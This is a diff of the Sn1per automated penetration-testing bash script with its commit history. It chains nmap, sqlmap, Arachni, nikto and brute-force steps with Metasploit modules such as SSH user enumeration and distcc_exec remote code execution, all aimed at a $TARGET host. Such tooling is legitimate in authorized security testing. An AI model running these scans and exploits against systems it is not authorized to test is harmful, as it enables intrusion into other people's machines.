 	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
 elif [ "$OPT1" == "web" ]; then
@@ -542,6 +676,7 @@ port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -569,9 +704,9 @@ then
 	echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
-	cd ssh-audit
+	cd $PLUGINS_DIR/ssh-audit
 	python ssh-audit.py $TARGET:22
-	cd ..
+	cd $INSTALL_DIR
 	nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
 	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 fi
@@ -642,6 +777,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
 	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
 	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
 	echo ""
@@ -697,8 +835,13 @@ else
 		echo ""
 		python $CMSMAP -t http://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
-		uniscan -u http://$TARGET -qweds
+		mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
 		arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
 		cd $INSTALL_DIR/loot/web/$TARGET-http/
 		arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
 		unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
 		cd $INSTALL_DIR
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
@@ -820,6 +963,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
 	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
 	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
 	echo ""
@@ -873,8 +1019,18 @@ else
 		echo ""
 		python $CMSMAP -t https://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
+		if [ $ARACHNI == "1" ];
-		uniscan -u https://$TARGET -qweds
+		then
 			echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
 		else
 			echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
 			mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
 			arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
 			cd $INSTALL_DIR/loot/web/$TARGET-https/
 			arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
 			unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
 			cd $INSTALL_DIR
 		fi
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
@@ -1006,6 +1162,26 @@ else
 	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
 fi
 if [ -z "$port_8443" ];
 then
 	echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
 	wafw00f http://$TARGET:4443
 	echo ""
 	whatweb http://$TARGET:4443
 	echo ""
 	xsstracer $TARGET 4443
 	sslscan --no-failed $TARGET:4443
 	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
 	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 4443
 	cd $INSTALL_DIR
 	nikto -h https://$TARGET:4443 
 	cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
 	nmap -A -p 4443 -T5 --script=*proxy* $TARGET
 fi
 if [ -z "$port_5432" ];
 then
 	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
@@ -1182,6 +1358,13 @@ cd $PLUGINS_DIR/yasuo
 ruby yasuo.rb -r $TARGET -b all
 cd $SNIPER_DIR
 if [ "$FULLNMAPSCAN" = "0" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
 else
 	echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
 	nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 fi
 if [ "$AUTOBRUTE" = "0" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
 else
@@ -1192,6 +1375,8 @@ else
 	rm -f scan.log
 	echo ""
 fi
-loot
+
 rm -f $LOOT_DIR/.fuse_* 2> /dev/null
 echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 exit 0
Author	SHA1	Message	Date
root	e7564e82f4	Sn1per by 1N3@CrowdShield	2016-11-30 10:29:40 -05:00
root	83c4e9f1e7	Sn1per by 1N3@CrowdShield	2016-11-23 12:34:55 -05:00
root	24a24a65cd	Sn1per by 1N3@CrowdShield	2016-10-27 11:22:10 -04:00
root	11d72969e3	Sn1per by 1N3@CrowdShield	2016-10-17 13:32:45 -04:00
root	0dd5ce9056	Sn1per by 1N3@CrowdShield	2016-10-14 16:20:42 -04:00